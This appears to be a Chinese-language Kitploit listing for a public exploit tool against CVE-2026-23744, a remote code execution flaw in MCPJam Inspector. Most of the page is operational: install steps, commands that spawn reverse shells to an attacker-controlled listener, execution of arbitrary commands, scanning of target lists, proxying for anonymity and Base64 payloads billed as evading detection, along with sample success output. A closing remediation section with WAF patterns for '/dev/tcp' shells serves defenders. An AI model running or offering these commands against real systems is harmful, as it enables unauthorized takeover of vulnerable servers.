Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-MCPJam-Exploit — CVE-2026-23744 的概念验证漏洞利用程序——MCPJam Inspector 远程代码执行(RCE)漏洞。该工具演示了版本 <=1.4.2 中的安全缺陷,并帮助安全研究人员验证补丁。仅用于授权测试和教育目的。包含多种载荷选项、命令执行和会话管理功能。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育Payload 开发
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

CVE-2026-23744 的概念验证漏洞利用程序——MCPJam Inspector 远程代码执行(RCE)漏洞。该工具演示了版本 <=1.4.2 中的安全缺陷,并帮助安全研究人员验证补丁。仅用于授权测试和教育目的。包含多种载荷选项、命令执行和会话管理功能。

查看仓库
7141个月前尚未审核
分享

CVE-2026-23744 MCPJam Inspector RCE 漏洞利用

Security Research Python 3.7+ Version Author


⚠️ 免责声明

此工具仅用于授权的安全测试和教育目的。未经授权的使用是非法的。用户需对其行为承担全部责任。


📋 概述

此仓库包含针对 CVE-2026-23744 的概念验证利用代码,该漏洞是 MCPJam Inspector 版本 <=1.4.2 中存在的未认证远程代码执行(RCE)漏洞。该漏洞的 CVSS 评分为 9.8(严重),表明存在网络攻击向量的高风险。

属性详情
CVE IDCVE-2026-23744
漏洞类型未认证远程代码执行
受影响版本<=1.4.2
CVSS 评分9.8(严重)
攻击向量网络

📸 截图

示例

🚀 功能特性

该利用工具提供了一套全面的功能,专为有效的安全测试而设计:

  • 多载荷支持:包括 Bash、Python、Netcat、Perl、PHP 和 Base64 载荷。
  • 命令执行:在目标系统上执行命令并捕获输出。
  • 目标扫描:扫描多个目标,支持可配置的速率限制。
  • 会话管理:持续会话管理,用于持续测试。
  • 代理支持:集成代理,实现匿名或路由流量。
  • 目标指纹识别:识别目标系统特征。
  • 自动监听器设置:自动配置监听器用于反弹 shell。

📦 安装

按以下步骤设置利用工具:

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. 安装依赖:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 使用示例

基本利用

要发起基本利用,首先设置监听器,然后运行利用脚本:

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 运行利用
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

命令执行

执行单个命令或从文件读取命令:

root@kitploit:~
# 执行单个命令
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# 从文件执行命令
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

不同载荷

根据不同场景使用多种载荷类型:

root@kitploit:~
# Python 反弹 shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat 反弹 shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 编码载荷
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

目标扫描

扫描多个目标是否存在漏洞:

root@kitploit:~
# 创建目标文件
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# 扫描易受攻击的目标
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

高级选项

探索高级功能,如指纹识别、代理使用、详细模式及自动监听器设置:

root@kitploit:~
# 带指纹识别
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# 带代理
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# 详细模式
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# 自动监听器
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 载荷类型

类型命令最佳适用
bashBash 反弹 shell大多数 Linux 系统
pythonPython3 反弹 shell已安装 Python 的系统
ncNetcat 反弹 shell具有 netcat 的系统
perlPerl 反弹 shell已安装 Perl 的系统
phpPHP 反弹 shell已安装 PHP 的系统
base64Base64 编码逃避检测

📊 示例输出

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ 修复措施

立即行动

为防范 CVE-2026-23744,必须立即采取以下措施:

  • 将 MCPJam Inspector 升级至版本 >1.4.2。
  • 将易受攻击的系统与网络隔离。
  • 监控对 /api/mcp/connect 的可疑 POST 请求。
  • 实施 Web 应用防火墙(WAF)规则以阻止恶意模式。

WAF 规则示例

用于阻止常见恶意模式的 Nginx WAF 规则示例:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ 常见问题

问:使用此工具合法吗?

答:此工具仅适用于你拥有或已获得明确书面授权进行测试的系统。

问:哪些系统存在漏洞?

答:MCPJam Inspector 版本 <=1.4.2 存在漏洞。

问:如何保护我的系统?

答:立即将 MCPJam Inspector 升级至版本 >1.4.2。


📚 参考来源

  • CVE-2026-23744 MITRE

👤 作者

Sudeepa Wanigarathna

  • GitHub:@CerberusMrXi

📝 更新日志

版本 2.0(2026 年 7 月 14 日)

  • ✅ 修复了监听器检查的可靠性
  • ✅ 实现了命令执行模式
  • ✅ 添加了目标指纹识别
  • ✅ 增强了会话管理
  • ✅ 添加了载荷回退

版本 1.0(2026 年 7 月 10 日)

  • ✅ 初始版本

⚠️ 最后警告

未经授权使用此工具是违法的,可能导致严重后果,包括:

  • 刑事起诉
  • 民事诉讼
  • 永久犯罪记录
  • 专业处分

由 Sudeepa Wanigarathna 用 ❤️ 制作

下载工具